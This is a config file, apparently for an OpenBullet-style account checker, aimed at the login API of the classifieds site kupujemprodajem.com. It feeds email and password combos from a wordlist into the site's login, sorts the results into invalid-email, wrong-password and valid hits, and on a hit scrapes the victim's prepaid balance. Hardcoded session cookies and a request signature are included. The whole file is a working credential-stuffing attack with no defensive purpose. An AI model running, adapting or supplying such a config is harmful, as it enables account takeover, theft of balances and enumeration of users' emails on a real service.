[SETTINGS]
{
  "Name": "kupujemprodajem",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-01T14:35:07.1019812+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "kupujemprodajem",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.kupujemprodajem.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"form_id\" value=\"" "\" />" -> VAR "id" 

REQUEST POST "https://www.kupujemprodajem.com/api/web/v1/auth/login" 
  CONTENT "form_id=<id>&email=<USER>&password=<PASS>&remember=no" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "\\Accept: text/javascript, text/html, application/xml, text/xml, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 106" 
  HEADER "Content-type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Cookie: KUPUJEMPRODAJEM=bco684hll6lvq1b4l2ovulne42; machine_id=1deab58f9ead9ccd9905d1a284681eef; _gid=GA1.2.1548058142.1634936131; __gfp_64b=.P6HhJaRVe1Ae_KxkBurjKaAqafdhjzSgs38RJedHZr.07|1634936133; _fbp=fb.1.1634936134199.1606175645; welcome_modal=1; FCCDCF=[null,null,[\"[[],[],[],[],null,null,true]\",1634936136370],null]; __gads=ID=77d27fdc6f0ef796:T=1634936139:S=ALNI_MbLsJ-2j8i2p0sqnFjNRnMDOYBtdg; _gat_UA-3494319-1=1; _ga_Z0597WW2Y0=GS1.1.1634936131.1.1.1634936451.59; _ga=GA1.2.1831465200.1634936131; _ga_MD1JVXY53Y=GS1.1.1634936131.1.1.1634936462.48" 
  HEADER "Host: www.kupujemprodajem.com" 
  HEADER "Origin: https://www.kupujemprodajem.com" 
  HEADER "Referer: https://www.kupujemprodajem.com/login" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.30" 
  HEADER "x-kp-signature: c8da3299e366aff6c51aeea2dc5a443c7c88046a" 
  HEADER "X-Prototype-Version: 1.7" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false,\"errors\":[{\"error_code\":\"user_email_exist\",\"error_description\":\"Nalog sa ovom e-mail nije prona\\u0111en\"}]}" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "{\"success\":false,\"errors\":[{\"error_code\":\"user_password_match\",\"error_description\":\"Pogre\\u0161na lozinka\"}]}" 
  KEYCHAIN Success OR 
    KEY "{\"success\":true,\"errors\":" 

REQUEST GET "https://www.kupujemprodajem.com/user.php?action=transactions" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<strong id=\"prepaidBalance\">" "</" CreateEmpty=FALSE -> CAP "kredit" 

